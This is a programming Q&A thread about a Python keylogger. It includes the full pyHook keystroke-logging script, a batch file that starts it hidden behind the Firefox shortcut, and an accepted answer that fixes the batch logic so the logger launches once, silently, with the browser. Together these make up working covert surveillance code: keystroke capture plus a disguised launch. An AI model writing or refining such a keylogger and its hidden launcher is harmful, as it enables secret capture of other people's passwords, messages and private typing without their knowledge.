# don't run python script if it is already running

Tags: python, python-2.7, batch-file, keylogger

I made a simple Python keylogging program following [this guy](https://www.youtube.com/watch?v=8BiOPBsXh0g&list=HL1399919368&feature=mh_lolz)'s tutorial. The `.pyw` file is below:

```
import pyHook, pythoncom, sys, logging

file_log = 'C:\\Python27\\logger.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

It subtly runs when I use firefox because the firefox shortcut calls a batch file which contains:

```
@echo off
tasklist /FI "IMAGENAME eq c:\Python27\keylogger.pyw" 2>NUL | find /I /N "c:\Python27\keylogger.pyw">NUL
if not "%ERRORLEVEL%"=="0" start "" "c:\Python27\keylogger.pyw" #doesn't work

start "" "c:\Program Files (x86)\Mozilla Firefox\firefox.exe"
```

My problem is that, if I run firefox more than once (which happens often), this script runs again and repeats itself, so I get these kind of results in the logging text file.

```
g
g
o
o
o
o
g
g
l
l
e
e
```

I need some `if` condition which doesn't allow this script to run if it's already running.

Comment: here's a post on how to check if a process is running via batch script http://stackoverflow.com/questions/162291/how-to-check-if-a-process-is-running-via-a-batch-script maybe that will help some

Comment: see: http://stackoverflow.com/questions/489861/locking-a-file-in-python

Answer (score 0, accepted):

try this:

```
@echo off
for /f "tokens=1 delims= " %%a in ('tasklist /v ^| findstr "keylogger"') do set running_check=%%a
if not defined running_check start "" "c:\Python27\keylogger.pyw"
start "" "c:\Program Files (x86)\Mozilla Firefox\firefox.exe"
```

Edit: fixed the for loop

Comment: Try to give your python script a title and replace the `keylogger` with that title string